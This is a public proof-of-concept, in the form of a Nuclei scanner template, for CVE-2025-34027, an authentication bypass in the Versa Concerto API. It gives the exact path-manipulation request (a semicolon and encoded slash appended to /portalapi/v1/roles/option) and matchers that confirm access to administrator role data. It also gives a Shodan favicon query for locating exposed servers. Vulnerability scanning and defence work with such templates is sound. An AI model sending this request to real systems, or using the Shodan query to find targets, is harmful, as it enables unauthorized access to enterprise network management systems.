Authentication bypass in the Versa Concerto API, caused by URL decoding inconsistencies. It allowed unauthorized access to certain API endpoints by manipulating the URL path.This issue enabled attackers to bypass authentication controls and access restricted resources.
PoC代码[已公开]
id: CVE-2025-34027
info:
name: Versa Concerto API Path Based - Authentication Bypass
author: iamnoooob,rootxharsh,parthmalhotra,pdresearch
severity: critical
description: |
Authentication bypass in the Versa Concerto API, caused by URL decoding inconsistencies. It allowed unauthorized access to certain API endpoints by manipulating the URL path.This issue enabled attackers to bypass authentication controls and access restricted resources.
reference:
- https://projectdiscovery.io/blog/versa-concerto-authentication-bypass-rce/
- https://versa-networks.com/documents/datasheets/versa-concerto.pdf
- https://www.cve.org/CVERecord?id=CVE-2025-34027
- https://security-portal.versa-networks.com/emailbulletins/6830fa3f28defa375486ff2f
classification:
epss-score: 0.0545
epss-percentile: 0.89811
cpe: cpe:2.3:a:versa-networks:concerto:*:*:*:*:*:*:*:*
metadata:
verified: true
vendor: versa-networks
product: concerto
max-request: 1
shodan-query: http.favicon.hash:-534530225
tags: cve,cve2025,versa,concerto,auth-bypass,vkev
http:
- raw:
- |
GET /portalapi/v1/roles/option;%2fv1%2fping HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- ENTERPRISE_ADMINISTRATOR
- type: word
part: header
words:
- EECP-CSRF-TOKEN
# digest: 490a0046304402202a4800bd451e7facdb9530a8bd069a6b766393508686a3495d467c41a97d9f8602204f43ff2e1635a2c8f33232317ef8f7b02313d91c3e92755672cc1897f7c9306f:922c64590222798bb761d5b6d8e72950